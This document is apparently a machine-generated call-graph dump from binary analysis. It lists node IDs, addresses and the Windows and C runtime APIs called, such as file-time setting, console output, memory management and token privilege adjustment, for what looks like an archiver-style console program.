b11e89 free 30437->30470 30439 b3c405 30471 b3206a __EH_prolog 30439->30471 30442 b3c095 30442->30441 30454 b3c670 __EH_prolog 30442->30454 30444 b3c13c 30461 b3bece __EH_prolog 30444->30461 30446 b3c16d 30447 b3c177 30446->30447 30451 b3c452 30446->30451 30448 b56b33 _CxxThrowException 30447->30448 30450 b3c17f 30448->30450 30449 b3206a 2 API calls 30449->30441 30452 b3206a 2 API calls 30450->30452 30451->30449 30453 b3c19d 30452->30453 30455 b12d90 2 API calls 30454->30455 30456 b3c6b3 30455->30456 30457 b12d90 2 API calls 30456->30457 30458 b3c6bf 30457->30458 30459 b12d90 2 API calls 30458->30459 30460 b3c6cb 30459->30460 30460->30444 30462 b3bf25 30461->30462 30463 b3bef8 30461->30463 30465 b11e55 2 API calls 30462->30465 30466 b3beff 30462->30466 30464 b11e55 2 API calls 30463->30464 30464->30466 30465->30466 30466->30446 30468 b3812e 30467->30468 30468->30423 30469->30437 30470->30439 30472 b3208d 30471->30472 30483 b11e89 free 30472->30483 30474 b3209d 30484 b11e89 free 30474->30484 30476 b320a5 30485 b11e89 free 30476->30485 30478 b320ad 30478->30442 30479->30430 30480->30434 30481->30422 30482->30428 30483->30474 30484->30476 30485->30478 30486 b1ab2d 30487 b1ab42 30486->30487 30488 b1ab3c 30486->30488 30489 b1fed3 71 API calls 30488->30489 30489->30487 30490 b4f196 30495 b4f1b2 __EH_prolog 30490->30495 30494 b4f1ab 30496 b4f1d5 ctype 30495->30496 30504 b11e89 free 30496->30504 30498 b4f1f5 30505 b11e89 free 30498->30505 30500 b4f1fd 30506 b4ee3e __EH_prolog 30500->30506 30503 b11e89 free 30503->30494 30504->30498 30505->30500 30511 b11e89 free 30506->30511 30508 b4ee5b 30512 b11e89 free 30508->30512 30510 b4ee63 30510->30494 30510->30503 30511->30508 30512->30510 30513 b23297 30514 b232a4 30513->30514 30516 b232b5 30513->30516 30514->30516 30517 b11e89 free 30514->30517 30517->30516 30518 b2f2d4 30519 b169ab 28 API calls 30518->30519 30520 b2f2e7 30519->30520 30521 b1c017 30522 b1c024 30521->30522 30526 b1c035 30521->30526 30522->30526 30527 b1c03c __EH_prolog 30522->30527 30524 b1c02f 30529 b11e89 free 30524->30529 30528 b1c05e 30527->30528 30528->30524 30529->30526 30530 b58f13 __EH_prolog 30531 b58f37 30530->30531 30538 b5b38f 30531->30538 30533 b58f9a 30535 b58fa1 30533->30535 30544 b5d45b __EH_prolog 30533->30544 30536 b5900d 30536->30535 30549 b5ebe8 23 API calls ctype 30536->30549 30539 b5b39f 30538->30539 30550 b1fddb 30539->30550 30542 b5b3c2 30542->30533 30565 b5d01d __EH_prolog 30544->30565 30547 b5d4d3 30547->30536 30548 b5d49c _CxxThrowException 30548->30536 30549->30535 30552 b1b1f1 3 API calls 30550->30552 30551 b1fdf3 30551->30542 30553 b5b0fc __EH_prolog 30551->30553 30552->30551 30562 b1feb1 30553->30562 30555 b5b130 30555->30542 30556 b5b11d 30556->30555 30557 b5b166 _CxxThrowException 30556->30557 30558 b5b17b memcpy 30556->30558 30557->30558 30559 b5b196 30558->30559 30559->30555 30560 b5b23a memmove 30559->30560 30561 b5b264 memcpy 30559->30561 30560->30559 30561->30555 30563 b1fe65 6 API calls 30562->30563 30564 b1fec4 30563->30564 30564->30556 30570 b5d03c 30565->30570 30566 b5d239 30566->30547 30566->30548 30567 b5d13e 30567->30566 30588 b1b1f1 3 API calls 30567->30588 30568 b5d2e8 30568->30566 30569 b5d30e 30568->30569 30571 b11e55 2 API calls 30568->30571 30572 b1feb1 6 API calls 30569->30572 30570->30566 30570->30567 30573 b1feb1 6 API calls 30570->30573 30571->30569 30576 b5d324 30572->30576 30573->30567 30574 b5d328 30621 b11e89 free 30574->30621 30576->30574 30578 b5d343 30576->30578 30616 b5aeb1 _CxxThrowException 30576->30616 30579 b5d404 30578->30579 30580 b5d39a 30578->30580 30617 b5aeb1 _CxxThrowException 30578->30617 30620 b5c88d 29 API calls ctype 30579->30620 30589 b5c5f8 __EH_prolog 30580->30589 30586 b5d3d8 30586->30579 30619 b5aeb1 _CxxThrowException 30586->30619 30588->30568 30590 b5c61b 30589->30590 30622 b5c33e 30590->30622 30592 b2000a 3 API calls 30614 b5c65f 30592->30614 30593 b5c7c1 30684 b11e89 free 30593->30684 30594 b5c82d _CxxThrowException 30601 b5c841 30594->30601 30596 b5c7f8 30685 b11e89 free 30596->30685 30597 b14268 3 API calls 30597->30614 30599 b5c800 30686 b11e89 free 30599->30686 30688 b11e89 free 30601->30688 30602 b11e55 2 API calls 30602->30614 30603 b5c808 30687 b580a9 free ctype 30603->30687 30606 b5c866 30689 b11e89 free 30606->30689 30607 b5c81a 30607->30574 30607->30586 30618 b5aeb1 _CxxThrowException 30607->30618 30609 b5c86e 30690 b11e89 free 30609->30690 30612 b5c876 30691 b580a9 free ctype 30612->30691 30614->30592 30614->30593 30614->30594 30614->30597 30614->30601 30614->30602 30615 b5aeb1 _CxxThrowException 30614->30615 30632 b53fd5 __EH_prolog 30614->30632 30615->30614 30616->30578 30617->30580 30618->30586 30619->30579 30620->30574 30621->30566 30623 b5c351 30622->30623 30625 b5c3b7 30623->30625 30626 b5c388 30623->30626 30692 b5aeb1 _CxxThrowException 30623->30692 30627 b5c417 30625->30627 30694 b56b77 malloc _CxxThrowException free _CxxThrowException memcpy 30625->30694 30626->30625 30693 b5aeb1 _CxxThrowException 30626->30693 30628 b5c494 30627->30628 30695 b5aeb1 _CxxThrowException 30627->30695 30628->30614 30633 b54013 30632->30633 30634 b54037 30633->30634 30696 b54d69 30633->30696 30634->30614 30637 b54117 30641 b11e55 2 API calls 30637->30641 30638 b5414f 30639 b11e55 2 API calls 30638->30639 30663 b5411c 30639->30663 30640 b5406d 30640->30637 30640->30638 30658 b540b6 30640->30658 30678 b54287 30640->30678 30641->30663 30642 b5470d 30643 b11e55 2 API calls 30642->30643 30669 b5473b 30643->30669 30644 b549d4 30646 b549f6 30644->30646 30648 b11e55 2 API calls 30644->30648 30645 b54261 30711 b4ecb8 malloc _CxxThrowException free memcpy ctype 30645->30711 30648->30646 30657 b11e55 malloc _CxxThrowException 30657->30669 30723 b11e89 free 30658->30723 30660 b54793 30716 b54baf SysStringLen memset SysFreeString 30660->30716 30661 b54411 30712 b11e89 free 30661->30712 30663->30645 30663->30658 30663->30661 30710 b1a853 malloc _CxxThrowException __EH_prolog 30663->30710 30667 b547ba SysFreeString 30667->30658 30669->30644 30669->30657 30669->30658 30682 b1b1f1 3 API calls 30669->30682 30671 b11e55 malloc _CxxThrowException 30671->30678 30672 b54799 30715 b11e89 free 30672->30715 30673 b547e6 30717 b11e89 free 30673->30717 30676 b11e89 free ctype 30676->30678 30677 b547ee 30718 b11e89 free 30677->30718 30678->30642 30678->30658 30678->30660 30678->30671 30678->30672 30678->30673 30678->30676 30713 b54bed memset 30678->30713 30714 b54baf SysStringLen memset SysFreeString 30678->30714 30681 b5454d SysFreeString 30681->30678 30682->30669 30684->30596 30685->30599 30686->30603 30687->30607 30688->30606 30689->30609 30690->30612 30691->30607 30692->30626 30693->30625 30694->30625 30695->30628 30697 b54d7b 30696->30697 30724 b26a15 30697->30724 30700 b4ef37 4 API calls 30701 b54dd1 30700->30701 30702 b26a15 4 API calls 30701->30702 30703 b54de0 30702->30703 30704 b4ef37 4 API calls 30703->30704 30705 b54e27 30704->30705 30705->30640 30710->30663 30711->30678 30712->30634 30713->30678 30714->30681 30715->30660 30716->30667 30717->30677 30718->30658 30723->30634 30725 b26a28 30724->30725 30726 b26a68 30724->30726 30727 b26a30 _CxxThrowException 30725->30727 30728 b26a45 30725->30728 30726->30700 30727->30728 30732 b11e89 free 30728->30732 30730 b26a4c 30731 b11e55 2 API calls 30730->30731 30731->30726 30732->30730 30733 b6b350 30734 b6b357 malloc 30733->30734 30735 b6b354 30733->30735 30736 b77c10 EnterCriticalSection 30737 b77c76 30736->30737 30739 b77c9e LeaveCriticalSection 30736->30739 30737->30739 30741 b1aa58 30737->30741 30742 b1aa6a 30741->30742 30745 b1f755 30742->30745 30743 b1aa8e 30743->30739 30747 b1f77e 30745->30747 30746 b1f7e8 30746->30743 30747->30746 30749 b446b5 EnterCriticalSection 30747->30749 30750 b446d0 30749->30750 30751 b446eb 30749->30751 30752 b4b752 11 API calls 30750->30752 30753 b446f0 LeaveCriticalSection 30751->30753 30752->30751 30753->30746 30754 b4e75d 30755 b4e774 30754->30755 30758 b4f101 __EH_prolog 30755->30758 30757 b4e7a7 30759 b56b33 _CxxThrowException 30758->30759 30760 b4f114 30759->30760 30761 b11e55 2 API calls 30760->30761 30762 b4f11e 30761->30762 30762->30757 30763 b17a5b SetEndOfFile 30764 b1795a SetFileTime 30765 b4925b 30766 b49264 fputs 30765->30766 30767 b49278 30765->30767 30893 b11fe9 fputc 30766->30893 30894 b44249 30767->30894 30771 b12d90 2 API calls 30772 b492d0 30771->30772 30898 b30621 __EH_prolog 30772->30898 30774 b492f8 30947 b11e89 free 30774->30947 30776 b49307 30777 b4931d 30776->30777 30778 b4b618 5 API calls 30776->30778 30780 b4933d 30777->30780 30948 b445e7 __EH_prolog 30777->30948 30778->30777 30781 b11e55 2 API calls 30780->30781 30783 b498f5 30780->30783 30792 b49369 30781->30792 30782 b49a69 30785 b4a7a1 _CxxThrowException 30782->30785 30783->30782 30784 b49a64 30783->30784 31046 b4a7bc 38 API calls 30784->31046 30787 b49a71 30785->30787 31047 b11e89 free 30787->31047 30789 b49a7c 30790 b32046 free 30789->30790 30791 b49a8c 30790->30791 31048 b11e89 free 30791->31048 30795 b22722 5 API calls 30792->30795 30794 b49aac 31049 b4ac40 free __EH_prolog ctype 30794->31049 30797 b4945d 30795->30797 30798 b12d90 2 API calls 30797->30798 30801 b49465 30798->30801 30799 b49ac7 30800 b494a5 30958 b30e95 __EH_prolog 30800->30958 30801->30800 31023 b3255b 14 API calls ctype 30801->31023 30804 b4949e 30806 b4a7a1 _CxxThrowException 30804->30806 30806->30800 30807 b49511 30809 b49551 30807->30809 31024 b11fe9 fputc 30807->31024 30808 b4b618 5 API calls 30808->30807 30810 b495cd 30809->30810 31027 b11fe9 fputc 30809->31027 30817 b49529 fputs 31025 b11fe9 fputc 30817->31025 30893->30767 30895 b44252 30894->30895 30896 b4425f 30894->30896 31050 b1275a malloc _CxxThrowException free ctype 30895->31050 30896->30771 30899 b30640 30898->30899 31051 b2efe3 __EH_prolog 30899->31051 30904 b30682 31059 b3086e free __EH_prolog __EH_prolog ctype 30904->31059 30906 b306fe 31061 b3086e free __EH_prolog __EH_prolog ctype 30906->31061 30908 b3070d 30920 b3072f 30908->30920 31062 b30b3c malloc _CxxThrowException __EH_prolog 30908->31062 30910 b56b33 _CxxThrowException 30912 b306a4 30910->30912 30911 b30721 _CxxThrowException 30911->30920 30912->30906 30912->30910 30914 b11524 3 API calls 30912->30914 31060 b11e89 free 30912->31060 30913 b30787 30917 b36cb9 free 30913->30917 30914->30912 30915 b12d90 2 API calls 30915->30920 30919 b307aa 30917->30919 30918 b16058 8 API calls 30918->30920 30921 b4ef37 4 API calls 30919->30921 30920->30913 30920->30915 30920->30918 30922 b56b33 _CxxThrowException 30920->30922 30924 b11524 3 API calls 30920->30924 31063 b11e89 free 30920->31063 30923 b307b3 30921->30923 30922->30920 30925 b36cb9 free 30923->30925 30924->30920 30926 b307c0 30925->30926 30928 b4ef37 4 API calls 30926->30928 30932 b307c8 30928->30932 30929 b30818 31065 b11e89 free 30929->31065 30930 b11524 __EH_prolog malloc _CxxThrowException 30930->30932 30932->30929 30932->30930 30935 b3084c 30932->30935 31064 b142b1 CharUpperW 30932->31064 30933 b30690 30933->30774 31066 b30b3c malloc _CxxThrowException __EH_prolog 30935->31066 30937 b30860 _CxxThrowException 30938 b3086e __EH_prolog 30937->30938 31067 b11e89 free 30938->31067 30940 b30891 31068 b30c74 free __EH_prolog ctype 30940->31068 30942 b308a6 31069 b11e89 free 30942->31069 30944 b308ae 31070 b11e89 free 30944->31070 30946 b308b6 30946->30774 30947->30776 30949 b445fd 30948->30949 30957 b44633 30948->30957 30950 b126d9 2 API calls 30949->30950 30951 b44605 30950->30951 31085 b44464 30951->31085 30955 b4462b 31100 b11e89 free 30955->31100 30957->30780 30970 b30efa 30958->30970 30959 b30fef 30960 b31008 30959->30960 30962 b11e55 2 API calls 30959->30962 30963 b11e55 2 API calls 30960->30963 30961 b12d90 2 API calls 30961->30970 30962->30960 30964 b31034 30963->30964 31002 b31047 30964->31002 31114 b22f49 __EH_prolog 30964->31114 30965 b12ea8 2 API calls 30965->30970 30968 b11e89 free ctype 30968->30970 30969 b169ab 28 API calls 30969->30970 30970->30959 30970->30961 30970->30965 30970->30968 30970->30969 30971 b3104b 30970->30971 31223 b56b77 malloc _CxxThrowException free _CxxThrowException memcpy 30970->31223 31224 b11e89 free 30971->31224 30974 b3107e 31225 b11e89 free 30974->31225 30975 b12d90 2 API calls 30975->31002 30976 b31854 31240 b11e89 free 30976->31240 30978 b31146 31239 b11e89 free 30978->31239 30980 b31086 31226 b11e89 free 30980->31226 30981 b3108e 30981->30807 30981->30808 30983 b169ab 28 API calls 30983->31002 30984 b31768 31238 b11e89 free 30984->31238 30985 b31635 31229 b11e89 free 30985->31229 30988 b31654 31230 b11e89 free 30988->31230 30990 b3165f 30992 b32046 free 30990->30992 30991 b3169c 31232 b11e89 free 30991->31232 30994 b3166c 30992->30994 30995 b316a7 30996 b32046 free 30995->30996 30999 b316b4 30996->30999 30997 b11e89 free ctype 30997->31002 31001 b32046 free 31001->31002 31002->30975 31002->30978 31002->30983 31002->30984 31002->30985 31002->30988 31002->30991 31002->30997 31002->31001 31003 b12ea8 2 API calls 31002->31003 31006 b316e5 31002->31006 31012 b31720 31002->31012 31020 b11fe9 fputc 31002->31020 31128 b44e72 31002->31128 31140 b45145 __EH_prolog 31002->31140 31169 b31ada __EH_prolog 31002->31169 31227 b22b1f 5 API calls ctype 31002->31227 31228 b1618f 9 API calls ctype 31002->31228 31003->31002 31234 b11e89 free 31006->31234 31009 b316f0 31010 b32046 free 31009->31010 31011 b316fd 31010->31011 31235 b11e89 free 31011->31235 31236 b11e89 free 31012->31236 31014 b3172b 31016 b32046 free 31014->31016 31017 b31738 31016->31017 31237 b11e89 free 31017->31237 31020->31002 31023->30804 31024->30817 31046->30782 31047->30789 31048->30794 31049->30799 31050->30896 31052 b2f05c 31051->31052 31071 b22a5f __EH_prolog GetCurrentProcess 31052->31071 31055 b2f3f7 __EH_prolog 31056 b2f41b 31055->31056 31058 b2f4b7 31056->31058 31084 b3021c 13 API calls ctype 31056->31084 31058->30904 31058->30912 31059->30933 31060->30912 31061->30908 31062->30911 31063->30920 31064->30932 31065->30933 31066->30937 31067->30940 31068->30942 31069->30944 31070->30946 31080 b22afd 31071->31080 31073 b22a86 OpenProcessToken 31074 b22a97 LookupPrivilegeValueW 31073->31074 31075 b22adc 31073->31075 31074->31075 31077 b22ab9 AdjustTokenPrivileges 31074->31077 31076 b22afd FindCloseChangeNotification 31075->31076 31078 b22ae8 31076->31078 31077->31075 31079 b22ace GetLastError 31077->31079 31078->31055 31079->31075 31081 b22b06 31080->31081 31082 b22b0a FindCloseChangeNotification 31080->31082 31081->31073 31083 b22b1a 31082->31083 31083->31073 31084->31058 31086 b44475 31085->31086 31087 b4449d 31085->31087 31088 b4437f 5 API calls 31086->31088 31101 b4437f 31087->31101 31091 b44491 31088->31091 31093 b12895 5 API calls 31091->31093 31093->31087 31094 b444fa fputs 31099 b11fe9 fputc 31094->31099 31095 b444cc 31095->31094 31096 b4437f 5 API calls 31095->31096 31097 b444ed 31096->31097 31098 b444fd 5 API calls 31097->31098 31098->31094 31099->30955 31100->30957 31102 b44399 31101->31102 31103 b12895 5 API calls 31102->31103 31104 b443a4 31103->31104 31105 b12895 5 API calls 31104->31105 31106 b443b3 31105->31106 31107 b444fd 31106->31107 31108 b44526 31107->31108 31109 b4450d 31107->31109 31108->31095 31110 b12895 5 API calls 31109->31110 31111 b44517 31110->31111 31113 b443b9 malloc _CxxThrowException free memcpy _CxxThrowException 31111->31113 31113->31108 31115 b22f96 31114->31115 31116 b12d90 2 API calls 31115->31116 31117 b22fbd 31116->31117 31118 b12d90 2 API calls 31117->31118 31119 b22fc9 31118->31119 31129 b44e7e 31128->31129 31130 b44f18 31129->31130 31131 b44b28 5 API calls 31129->31131 31130->31002 31132 b44eb9 31131->31132 31133 b44f02 31132->31133 31241 b11fe9 fputc 31132->31241 31133->31130 31136 b44edc fputs 31141 b45161 31140->31141 31142 b4516b 31140->31142 31144 b4b618 5 API calls 31141->31144 31257 b44839 31142->31257 31144->31142 31149 b45192 31154 b4523e fputs 31149->31154 31157 b12155 7 API calls 31149->31157 31158 b453d8 31149->31158 31160 b45326 fputs 31149->31160 31163 b11fe9 fputc 31149->31163 31157->31149 31163->31149 31170 b31b21 31169->31170 31171 b12ea8 2 API calls 31170->31171 31172 b31b34 31171->31172 31173 b12ea8 2 API calls 31172->31173 31175 b31b47 31173->31175 31223->30970 31224->30974 31225->30980 31226->30981 31227->31002 31228->31002 31229->30978 31230->30990 31232->30995 31234->31009 31235->30978 31236->31014 31237->30978 31238->30978 31239->30976 31240->30981 31241->31136 31258 b44845 31257->31258 31259 b4484f 31257->31259 31260 b4b618 5 API calls 31258->31260 31259->31149 31260->31259 31440 b57ec7 31441 b57ed4 31440->31441 31442 b57ee5 31440->31442 31441->31442 31446 b57eec __EH_prolog 31441->31446 31447 b57f25 31446->31447 31457 b11e89 free 31447->31457 31449 b57f30 31458 b11e89 free 31449->31458 31451 b57f3b 31459 b11e89 free 31451->31459 31453 b57f46 31460 b361a0 free __EH_prolog ctype 31453->31460 31455 b57edf 31456 b11e89 free 31455->31456 31456->31442 31457->31449 31458->31451 31459->31453 31460->31455 31461 b6b403 VirtualFree 31462 b48e42 31463 b48e4f 31462->31463 31464 b491a9 31462->31464 31466 b48e62 31463->31466 31467 b4905d 31463->31467 31465 b56b33 _CxxThrowException 31464->31465 31468 b491d8 31465->31468 31626 b48102 malloc _CxxThrowException __EH_prolog __EH_prolog __EH_prolog 31466->31626 31469 b49196 31467->31469 31470 b4906a 31467->31470 31471 b11524 3 API calls 31468->31471 31994 b4a393 fputc fputs fputs _CxxThrowException 31469->31994 31988 b4a32a 6 API calls 31470->31988 31474 b491e7 31471->31474 31478 b56b33 _CxxThrowException 31474->31478 31476 b49058 31480 b49a69 31476->31480 31483 b49a64 31476->31483 31477 b49075 31481 b36cb9 free 31477->31481 31479 b491ef 31478->31479 31482 b11524 3 API calls 31479->31482 31485 b4a7a1 _CxxThrowException 31480->31485 31486 b4909f 31481->31486 31487 b491fe 31482->31487 32018 b4a7bc 38 API calls 31483->32018 31484 b48e8e 31627 b4a19d 6 API calls 31484->31627 31489 b49a71 31485->31489 31490 b127b7 3 API calls 31486->31490 31494 b11e55 2 API calls 31487->31494 32019 b11e89 free 31489->32019 31493 b490d8 31490->31493 31496 b126d9 2 API calls 31493->31496 31514 b49369 31494->31514 31495 b49a7c 31497 b32046 free 31495->31497 31498 b490e0 31496->31498 31500 b49a8c 31497->31500 31989 b32b6f 48 API calls ctype 31498->31989 32020 b11e89 free 31500->32020 31501 b49100 31505 b127b7 3 API calls 31501->31505 31503 b48ef2 31506 b36cb9 free 31503->31506 31504 b49aac 32021 b4ac40 free __EH_prolog ctype 31504->32021 31508 b49121 31505->31508 31507 b48f78 31506->31507 31628 b3e6a7 __EH_prolog 31507->31628 31990 b4a4df 20 API calls ctype 31508->31990 31512 b4915b 31991 b11e89 free 31512->31991 31513 b48fd6 31515 b48fef 31513->31515 31517 b4b618 5 API calls 31513->31517 31520 b22722 5 API calls 31514->31520 31981 b4a4df 20 API calls ctype 31515->31981 31516 b49ac7 31517->31515 31523 b4945d 31520->31523 31521 b49178 31992 b11e89 free 31521->31992 31522 b49022 31982 b11e89 free 31522->31982 31525 b12d90 2 API calls 31523->31525 31532 b49465 31525->31532 31526 b49180 31993 b4ae2c free __EH_prolog ctype 31526->31993 31529 b49039 31983 b4add8 free __EH_prolog ctype 31529->31983 31531 b494a5 31535 b30e95 150 API calls 31531->31535 31532->31531 31995 b3255b 14 API calls ctype 31532->31995 31533 b49049 31984 b4823a 31533->31984 31538 b494fc 31535->31538 31537 b4949e 31539 b4a7a1 _CxxThrowException 31537->31539 31540 b49511 31538->31540 31541 b4b618 5 API calls 31538->31541 31539->31531 31542 b49551 31540->31542 31996 b11fe9 fputc 31540->31996 31541->31540 31543 b495cd 31542->31543 31999 b11fe9 fputc 31542->31999 31544 b49608 31543->31544 31547 b495e3 fputs 31543->31547 31549 b49647 31544->31549 31553 b49622 fputs 31544->31553 31554 b496c8 31544->31554 31551 b1224a fputs 31547->31551 31548 b49572 31548->31543 31552 b49584 fputs 31548->31552 31549->31554 31556 b49680 31549->31556 31557 b4965c fputs 31549->31557 31550 b49529 fputs 31997 b11fe9 fputc 31550->31997 31558 b49601 31551->31558 31559 b1224a fputs 31552->31559 31560 b1224a fputs 31553->31560 31577 b49718 31554->31577 32007 b11fe9 fputc 31554->32007 31556->31554 32005 b11fe9 fputc 31556->32005 31562 b1224a fputs 31557->31562 32002 b11fe9 fputc 31558->32002 31564 b495a1 31559->31564 31565 b49640 31560->31565 31561 b4953f 31998 b11fe9 fputc 31561->31998 31566 b49679 31562->31566 32000 b11fe9 fputc 31564->32000 32003 b11fe9 fputc 31565->32003 32004 b11fe9 fputc 31566->32004 31568 b49893 32017 b11e89 free 31568->32017 31572 b496e5 31572->31577 31579 b496f3 fputs 31572->31579 31575 b49695 31575->31554 31580 b496a3 fputs 31575->31580 31576 b498a2 32015 b11fe9 fputc 31576->32015 31577->31568 31577->31576 31582 b49754 31577->31582 31578 b495a8 fputs 31583 b1224a fputs 31578->31583 31585 b1224a fputs 31579->31585 31587 b1224a fputs 31580->31587 31582->31568 31593 b4976e fputs 31582->31593 31605 b49793 31582->31605 31584 b495c6 31583->31584 32001 b11fe9 fputc 31584->32001 31590 b49711 31585->31590 31591 b496c1 31587->31591 31588 b498a9 31588->31568 31592 b498ba fputs 31588->31592 32008 b11fe9 fputc 31590->32008 32006 b11fe9 fputc 31591->32006 31597 b1224a fputs 31592->31597 31598 b1224a fputs 31593->31598 31594 b497be fputs 31599 b1224a fputs 31594->31599 31600 b498d7 31597->31600 31601 b4978c 31598->31601 31602 b497dc 31599->31602 31600->31568 32016 b11fe9 fputc 31600->32016 32009 b11fe9 fputc 31601->32009 32010 b11fe9 fputc 31602->32010 31605->31594 31606 b49835 fputs 31605->31606 31608 b1224a fputs 31606->31608 31610 b49853 31608->31610 31609 b497e3 31609->31606 31611 b497ee fputs 31609->31611 31987 b11fe9 fputc 31610->31987 31613 b1224a fputs 31611->31613 31615 b49809 31613->31615 31614 b4985d fputs 31616 b1224a fputs 31614->31616 32011 b11fe9 fputc 31615->32011 31618 b4987f 31616->31618 32013 b11fe9 fputc 31618->32013 31619 b49810 fputs 31621 b1224a fputs 31619->31621 31622 b4982e 31621->31622 32012 b11fe9 fputc 31622->32012 31623 b49886 31623->31568 32014 b11fe9 fputc 31623->32014 31626->31484 31627->31503 31631 b3e6d1 31628->31631 31629 b14eb5 14 API calls 31630 b3e73b 31629->31630 32022 b308d0 32 API calls 31630->32022 31631->31629 31710 b3e6fa 31631->31710 31633 b3e743 31634 b12d90 2 API calls 31633->31634 31638 b3e894 31633->31638 31633->31710 31635 b3e772 31634->31635 31636 b12d90 2 API calls 31635->31636 31640 b3e780 31636->31640 31637 b3e8d1 31637->31710 32023 b3e1fe malloc _CxxThrowException free __EH_prolog ctype 31637->32023 31638->31637 32037 b3e36a malloc _CxxThrowException free CharUpperW 31638->32037 31645 b56b33 _CxxThrowException 31640->31645 31642 b3e8ed 31644 b3e91e 31642->31644 32039 b3e27e malloc _CxxThrowException free __EH_prolog ctype 31642->32039 31643 b3e8c0 31643->31710 32038 b3e3d5 6 API calls ctype 31643->32038 31648 b3e95b 31644->31648 31649 b3e940 _CxxThrowException 31644->31649 31659 b3ec99 31644->31659 31650 b3e79d 31645->31650 31654 b12d90 2 API calls 31648->31654 31649->31648 32028 b2286f malloc _CxxThrowException __EH_prolog 31650->32028 31651 b3e905 32040 b11e89 free 31651->32040 31653 b3e7ab 31656 b3e7b3 31653->31656 31671 b3e7cd 31653->31671 31657 b3e971 31654->31657 31655 b3ecd0 31662 b3ecd6 31655->31662 31663 b2efe3 8 API calls 31655->31663 32029 b1275a malloc _CxxThrowException free ctype 31656->32029 31661 b169ab 28 API calls 31657->31661 31659->31655 32059 b36ba0 CharUpperW 31659->32059 31666 b3e985 31661->31666 32108 b11e89 free 31662->32108 31667 b3ed07 31663->31667 31665 b3e7c3 32033 b11e89 free 31665->32033 31669 b3e989 31666->31669 31684 b3e9cb 31666->31684 31713 b3ed38 31667->31713 31729 b3edd8 31667->31729 31668 b3ecc1 32060 b11e89 free 31668->32060 31676 b3e9a9 31669->31676 31677 b3e98e _CxxThrowException 31669->31677 31670 b3e83b 31686 b3e87a 31670->31686 31687 b3e84d 31670->31687 31671->31670 31688 b12d35 2 API calls 31671->31688 31674 b3e9d8 32042 b3e0e5 __EH_prolog malloc _CxxThrowException free _CxxThrowException 31674->32042 31680 b3ec85 31676->31680 32041 b3e3d5 6 API calls ctype 31676->32041 31677->31676 31678 b3e868 32034 b11e89 free 31678->32034 31679 b3e9ea 32048 b11e89 free 31679->32048 32058 b11e89 free 31680->32058 31683 b3ea24 31696 b3ea2d 31683->31696 31708 b3ea55 31683->31708 31684->31674 31684->31679 31684->31683 32035 b11e89 free 31686->32035 32032 b3e0a5 6 API calls 31687->32032 31695 b3e804 31688->31695 31689 b3edd3 31690 b12d90 2 API calls 31689->31690 31698 b3efc1 31690->31698 31694 b3e9be 31694->31680 31701 b3e9c6 31694->31701 32030 b11e89 free 31695->32030 31703 b56b33 _CxxThrowException 31696->31703 31704 b12d90 2 API calls 31698->31704 31699 b3e889 32036 b11e89 free 31699->32036 31700 b3eb85 32049 b11e89 free 31700->32049 32054 b11e89 free 31701->32054 31707 b3ea3a 31703->31707 31709 b3efdb 31704->31709 31712 b11524 3 API calls 31707->31712 31714 b56b33 _CxxThrowException 31708->31714 31764 b3ea7b 31708->31764 31745 b3effc 31709->31745 32068 b16458 14 API calls ctype 31709->32068 31710->31513 31716 b3ea45 31712->31716 32061 b1a540 GetSystemTimeAsFileTime 31713->32061 31719 b3ea6f 31714->31719 31715 b3ec41 32055 b11e89 free 31715->32055 32043 b1275a malloc _CxxThrowException free ctype 31716->32043 32044 b320fc malloc _CxxThrowException 31719->32044 31720 b3e813 32031 b11e89 free 31720->32031 31722 b3ed83 31726 b56b33 _CxxThrowException 31722->31726 31727 b3edb2 31726->31727 32062 b36287 malloc _CxxThrowException __EH_prolog __EH_prolog memcpy 31727->32062 31729->31689 31730 b3ee4b 31729->31730 31734 b12d90 2 API calls 31729->31734 32106 b30dce free ctype 31730->32106 31732 b3edc4 32063 b30dce free ctype 31732->32063 31733 b3eaea 32046 b11e89 free 31733->32046 31735 b3ee93 31734->31735 31739 b2f3f7 14 API calls 31735->31739 31743 b3eea9 31739->31743 31740 b3fb61 32107 b3086e free __EH_prolog __EH_prolog ctype 31740->32107 31741 b3f1de 31749 b14268 3 API calls 31741->31749 31815 b3f222 31741->31815 31851 b3f2e1 31741->31851 31742 b3eb64 32047 b11e89 free 31742->32047 32064 b11e89 free 31743->32064 31752 b3f0eb wcscmp 31745->31752 31756 b11e89 free ctype 31745->31756 31758 b3f175 31745->31758 32069 b3e1fe malloc _CxxThrowException free __EH_prolog ctype 31745->32069 31749->31851 31750 b3eb6c 31753 b32046 free 31750->31753 31751 b3eeb7 31754 b3eebc 31751->31754 31790 b3eedd 31751->31790 31752->31745 31755 b3f128 31752->31755 31753->31679 31754->31730 32065 b1275a malloc _CxxThrowException free ctype 31754->32065 31759 b12d90 2 API calls 31755->31759 31756->31745 31757 b3f252 32072 b1275a malloc _CxxThrowException free ctype 31757->32072 31758->31741 31758->31757 32070 b3e1fe malloc _CxxThrowException free __EH_prolog ctype 31758->32070 32071 b11e89 free 31758->32071 31798 b3f130 31759->31798 31760 b3f5ca 32083 b40338 6 API calls 31760->32083 31764->31733 31769 b3eb93 31764->31769 31770 b3eb43 31764->31770 31766 b3f462 31766->31760 31772 b3f481 31766->31772 31773 b3f5bf 31766->31773 31767 b12d90 2 API calls 31767->31851 31768 b3f268 31774 b56b33 _CxxThrowException 31768->31774 31777 b3ebd6 31769->31777 31778 b3ebe8 31769->31778 32045 b1275a malloc _CxxThrowException free ctype 31770->32045 31771 b3f5ff 31779 b3f605 31771->31779 31780 b3f64d 31771->31780 32076 b11e89 free 31772->32076 32024 b3c03b 31773->32024 31781 b3f272 31774->31781 32050 b1275a malloc _CxxThrowException free ctype 31777->32050 31783 b3ec64 31778->31783 32051 b3e3d5 6 API calls ctype 31778->32051 32084 b11e89 free 31779->32084 31785 b36cb9 free 31780->31785 31786 b11524 3 API calls 31781->31786 32056 b11e89 free 31783->32056 31793 b3f655 31785->31793 31787 b3f27d 31786->31787 32073 b11e89 free 31787->32073 31789 b3ebe6 32052 b11e89 free 31789->32052 31790->31689 31790->31730 31795 b12d90 2 API calls 31790->31795 31820 b3f79f 31793->31820 32085 b3e2e0 malloc _CxxThrowException free __EH_prolog ctype 31793->32085 31794 b3ec6f 32057 b11e89 free 31794->32057 31802 b3ef20 31795->31802 31796 b3ec11 31796->31783 31796->31789 31804 b12ea8 2 API calls 31798->31804 31810 b12ea8 2 API calls 31802->31810 31813 b3f164 _CxxThrowException 31804->31813 31805 b11e89 free ctype 31805->31851 31806 b3f676 31814 b3f6f0 31806->31814 31831 b3f68c 31806->31831 31808 b3ec77 31816 b32046 